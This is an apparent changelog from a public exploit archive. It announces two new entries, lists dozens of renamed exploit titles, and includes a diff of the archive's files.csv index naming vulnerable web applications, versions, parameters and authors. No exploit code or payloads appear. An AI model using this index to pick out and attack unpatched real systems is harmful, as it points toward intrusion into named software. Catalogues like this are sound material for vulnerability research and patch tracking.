DB: 2017-01-05

2 new exploits

Kaspersky 17.0.0 - Local CA root is Incorrectly Protected

XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities
XAMPP 1.7.4 - Cross-Site Scripting

phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting
phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting

ASPPortal 3.1.1 - (downloadid) SQL Injection
ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection

ASPPortal 4.0.0 - (default1.asp) SQL Injection
ASPPortal 4.0.0 - 'default1.asp' SQL Injection

ASPTicker 1.0 - (admin.asp) Login Bypass (SQL Injection)
ASPTicker 1.0 - Authentication Bypass

Active Photo Gallery - 'default.asp catid' SQL Injection
Active Photo Gallery - 'catid' Parameter SQL Injection

Active Trade 2 - 'default.asp catid' SQL Injection
Active Trade 2 - 'catid' Parameter SQL Injection

Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection
Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection
SailPlanner 0.3a - (Authentication Bypass) SQL Injection
Bluo CMS 1.2 - (index.php id) Blind SQL Injection
SailPlanner 0.3a - Authentication Bypass
Bluo CMS 1.2 - Blind SQL Injection
ReVou Twitter Clone - (Authentication Bypass) SQL Injection
Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection
Active Force Matrix 2 - (Authentication Bypass) SQL Injection
ASPReferral 5.3 - 'AccountID' Blind SQL Injection
ActiveVotes 2.2 - (Authentication Bypass) SQL Injection
Active Test 2.1 - (Authentication Bypass) SQL Injection
Active Websurvey 9.1 - (Authentication Bypass) SQL Injection
Active Membership 2 - (Authentication Bypass) SQL Injection
eWebquiz 8 - (Authentication Bypass) SQL Injection
Active NewsLetter 4.3 - (Authentication Bypass) SQL Injection
Active Web Mail 4 - (Authentication Bypass) SQL Injection
Active Trade 2 - (Authentication Bypass) SQL Injection
Active Price Comparison 4 - (Authentication Bypass) SQL Injection
PHP TV Portal 2.0 - (index.php mid) SQL Injection
ReVou Twitter Clone - Authentication Bypass
Ocean12 FAQ Manager Pro - 'ID' Parameter Blind SQL Injection
Active Force Matrix 2 - Authentication Bypass
ASPReferral 5.3 - 'AccountID' Parameter Blind SQL Injection
ActiveVotes 2.2 - Authentication Bypass
Active Test 2.1 - Authentication Bypass
Active Websurvey 9.1 - Authentication Bypass
Active Membership 2 - Authentication Bypass
eWebquiz 8 - Authentication Bypass
Active NewsLetter 4.3 - Authentication Bypass
Active Web Mail 4 - Authentication Bypass
Active Trade 2 - Authentication Bypass
Active Price Comparison 4 - Authentication Bypass
PHP TV Portal 2.0 - 'mid' Parameter SQL Injection
Active Price Comparison 4 - 'ProductID' Blind SQL Injection
Active Bids 3.5 - 'itemID' Blind SQL Injection
Active Price Comparison 4 - 'ProductID' Parameter Blind SQL Injection
Active Bids 3.5 - 'itemID' Parameter Blind SQL Injection
Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection
Lito Lite CMS - 'cate.php cid' SQL Injection
Active Test 2.1 - 'QuizID' Blind SQL Injection
Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection
Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection
Active Time Billing 3.2 - (Authentication Bypass) SQL Injection
Active Web Helpdesk 2 - Authentication Bypass
Lito Lite CMS - 'cid' Parameter SQL Injection
Active Test 2.1 - 'QuizID' Parameter Blind SQL Injection
Active Web Helpdesk 2 - 'categoryId' Parameter Blind SQL Injection
Active Photo Gallery 6.2 - Authentication Bypass
Active Time Billing 3.2 - Authentication Bypass

Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure
Quick Tree View .NET 3.1 - Database Disclosure

z1exchange 1.0 - (edit.php site) SQL Injection
z1exchange 1.0 - 'site' Parameter SQL Injection
E.Z. Poll 2 - (Authentication Bypass) SQL Injection
ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure
bcoos 1.0.13 - (viewcat.php cid) SQL Injection
PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure
E.Z. Poll 2 - Authentication Bypass
ASPPortal 3.2.5 - Database Disclosure
bcoos 1.0.13 - 'viewcat.php' SQL Injection
PacPoll 4.0 - Database Disclosure
SunByte e-Flower - 'id' SQL Injection
Rapid Classified 3.1 - (cldb.mdb) Database Disclosure
Codefixer MailingListPro (MailingList.mdb) - Database Disclosure
Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection
SunByte e-Flower - 'id' Parameter SQL Injection
Rapid Classified 3.1 - Database Disclosure
Codefixer MailingListPro - Database Disclosure
Gallery MX 2.0.0 - Blind SQL Injection
Check New 4.52 - 'findoffice.php search' SQL Injection
Joomla! Component com_jmovies 1.1 - 'id' SQL Injection
Check New 4.52 - SQL Injection
Joomla! Component JMovies 1.1 - 'id' Parameter SQL Injection
Rae Media Contact MS - (Authentication Bypass) SQL Injection
Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion
ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion
Rae Media Contact MS - Authentication Bypass
Multi SEO phpBB 1.1.0 - Remote File Inclusion
ccTiddly 1.7.4 - 'cct_base' Parameter Remote File Inclusion

Easy News Content Management - 'News.mdb' Database Disclosure
Easy News Content Management - Database Disclosure
My Simple Forum 3.0 - (index.php action) Local File Inclusion
Joomla! Component mydyngallery 1.4.2 - (Directory) SQL Injection
Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution
My Simple Forum 3.0 - Local File Inclusion
Joomla! Component mydyngallery 1.4.2 - SQL Injection
Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution
RankEm - 'rankup.asp siteID' SQL Injection
RankEm - (Authentication Bypass) SQL Injection
RankEm - 'siteID' Parameter SQL Injection
Rankem - Authentication Bypass
Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities
Cold BBS - 'cforum.mdb' Remote Database Disclosure
Tizag Countdown Creator .v.3 - Insecure Upload
Merlix Teamworx Server - File Disclosure/Bypass
Cold BBS - Remote Database Disclosure
Tizag Countdown Creator 3 - Insecure Upload
ASP PORTAL - Multiple SQL Injections
ASPTicker 1.0 - (news.mdb) Remote Database Disclosure
ASP Portal - Multiple SQL Injections
ASPTicker 1.0 - Remote Database Disclosure
ASP PORTAL - 'xportal.mdb' Remote Database Disclosure
phpPgAdmin 4.2.1 - (_language) Local File Inclusion
ASP PORTAL - Remote Database Disclosure
phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion
PayPal eStore - Admin Password Changing Exploit
Product Sale Framework 0.1b - (forum_topic_id) SQL Injection
PayPal eStore - Admin Password Change
Product Sale Framework 0.1b - SQL Injection

Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion
Mini-CMS 1.0.1 - 'index.php' Local File Inclusion

MG2 0.5.1 - 'Filename' Remote Code Execution
MG2 0.5.1 - 'filename' Parameter Remote Code Execution
dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection
Poll Pro 2.0 - (Authentication Bypass) SQL Injection
Professional Download Assistant 0.1 - Authentication Bypass
Poll Pro 2.0 - Authentication Bypass

Peel Shopping 3.1 - (index.php rubid) SQL Injection
Peel Shopping 3.1 - 'rubid' Parameter SQL Injection

ProQuiz 1.0 - (Authentication Bypass) SQL Injection
ProQuiz 1.0 - Authentication Bypass

PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion
PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion
HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution
eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation
WebMaster Marketplace - 'member.php u' SQL Injection
HTMPL 1.11 - Command Execution
EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation
WebMaster Marketplace - SQL Injection

eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)
EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)

eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation
EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation

ReVou Twitter Clone - Admin Password Changing Exploit
ReVou Twitter Clone - Admin Password Change

w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection
w3blabor CMS 3.3.0 - Authentication Bypass

rankem - File Disclosure / Cross-Site Scripting / Cookie
Rankem - File Disclosure / Cross-Site Scripting / Cookie

revou twitter clone - Cross-Site Scripting / SQL Injection
Revou Twitter Clone - Cross-Site Scripting / SQL Injection

My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution
My Simple Forum 7.1 - Remote Command Execution

Mini-CMS 1.0.1 - (page.php id) SQL Injection
Mini-CMS 1.0.1 - 'page.php' SQL Injection

Texas Rankem - 'player.asp player_id' SQL Injection
Texas Rankem - 'player_id' Parameter SQL Injection

Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection
Mini-CMS RibaFS 1.0 - Authentication Bypass

reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting
ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting

Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection
Andy's PHP KnowledgeBase 0.95.4 - SQL Injection

Andy's PHP KnowledgeBase 0.95.2 - (viewusers.php) SQL Injection
Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection

Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections
Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections

PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection
PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection
Texas Rankem - player.asp selPlayer Parameter SQL Injection
Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection
Texas Rankem - 'selPlayer' Parameter SQL Injection
Texas Rankem - 'tournament_id' Parameter SQL Injection
Rapid Classified 3.1 - viewad.asp id Parameter SQL Injection
Rapid Classified 3.1 - view_print.asp id Parameter Cross-Site Scripting
Rapid Classified 3.1 - search.asp SH1 Parameter Cross-Site Scripting
Rapid Classified 3.1 - reply.asp Multiple Parameter Cross-Site Scripting
Rapid Classified 3.1 - advsearch.asp Denial of Serviceearch Parameter Cross-Site Scripting
Rapid Classified 3.1 - 'viewad.asp' SQL Injection
Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting
Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting
Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting
Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting

WebTester 5.0.20060927 - directions.php typeID Parameter SQL Injection
WebTester 5.0.20060927 - 'typeID' Parameter SQL Injection

phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting
phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting

Rapid Classified - AgencyCatResult.asp SQL Injection
Rapid Classified - 'AgencyCatResult.asp' SQL Injection
bcoos 1.0.10 - /myalbum/ratephoto.php lid Parameter SQL Injection
bcoos 1.0.10 - modules/mylinks/ratelink.php lid Parameter SQL Injection
bcoos 1.0.10 - 'ratephoto.php' SQL Injection
bcoos 1.0.10 - 'ratelink.php' SQL Injection

bcoos 1.0.10 - adresses/ratefile.php SQL Injection
bcoos 1.0.10 - 'ratefile.php' SQL Injection

bcoos 1.0.13 - 'include/common.php' Remote File Inclusion
bcoos 1.0.13 - 'common.php' Remote File Inclusion

bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection
bcoos 1.0.13 - 'click.php' SQL Injection
Z1Exchange 1.0 - showads.php id Parameter SQL Injection
Z1Exchange 1.0 - showads.php id Parameter Cross-Site Scripting
Z1Exchange 1.0 - 'id' Parameter SQL Injection
Z1Exchange 1.0 - 'id' Parameter Cross-Site Scripting

dotnetindex Professional Download Assistant 0.1 - SQL Injection
Professional Download Assistant 0.1 - SQL Injection
Active Bids - search.asp search Parameter Cross-Site Scripting
Active Bids - search.asp search Parameter SQL Injection
Active Bids - 'search' Parameter Cross-Site Scripting
Active Bids - 'search' Parameter SQL Injection

eZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting
EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting

Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting

files.csv

@@ -5925,6 +5925,7 @@ id,file,description,date,author,platform,type,port
 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
+40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root is Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
@@ -14690,7 +14691,7 @@ id,file,description,date,author,platform,type,port
 36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0
 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0
 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0
-36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0
+36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0
 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80
 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
@@ -15884,7 +15885,7 @@ id,file,description,date,author,platform,type,port
 910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0
 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0
 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0
-30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
+30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
@@ -16101,7 +16102,7 @@ id,file,description,date,author,platform,type,port
 1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution",2006-03-18,DarkFig,php,webapps,0
 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0
 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0
-1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - (downloadid) SQL Injection",2006-03-20,nukedx,asp,webapps,0
+1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection",2006-03-20,nukedx,asp,webapps,0
 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0
 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0
 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0
@@ -16935,7 +16936,7 @@ id,file,description,date,author,platform,type,port
 2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Blind SQL Injection",2006-11-12,rgod,php,webapps,0
 2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion",2006-11-12,Kacper,php,webapps,0
 2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
-2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - (default1.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
+2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0
 2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
 2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
@@ -17122,7 +17123,7 @@ id,file,description,date,author,platform,type,port
 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0
 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0
-3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login Bypass (SQL Injection)",2006-12-28,ajann,asp,webapps,0
+3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,asp,webapps,0
 3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0
 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0
 3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0
@@ -17415,7 +17416,7 @@ id,file,description,date,author,platform,type,port
 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0
 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - (module.php) Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0
 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0
-3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0
+3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' Parameter SQL Injection",2007-03-21,CyberGhost,asp,webapps,0
 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0
 3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0
 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0
@@ -17423,11 +17424,11 @@ id,file,description,date,author,platform,type,port
 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0
 3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection",2007-03-22,parad0x,asp,webapps,0
 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0
-3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
+3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' Parameter SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0
-3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0
+3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0
 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0
 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
@@ -20095,102 +20096,102 @@ id,file,description,date,author,platform,type,port
 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0
 7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
-7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
+7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,php,webapps,0
-7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
+7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
 7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
-7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0
+7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - Authentication Bypass",2008-11-28,R3d-D3V!L,php,webapps,0
-7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0
+7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Parameter Blind SQL Injection",2008-11-28,Stack,php,webapps,0
-7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
-7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7280,platforms/asp/webapps/7280.txt,"Active NewsLetter 4.3 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7280,platforms/asp/webapps/7280.txt,"Active NewsLetter 4.3 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0
-7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0
+7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' Parameter SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0
 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0
 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0
 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
-7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0
+7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Parameter Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0
-7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps,0
+7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Parameter Blind SQL Injection",2008-11-29,Stack,php,webapps,0
 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0
 7292,platforms/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0
-7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0
+7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - Authentication Bypass",2008-11-29,Cyber-Zone,asp,webapps,0
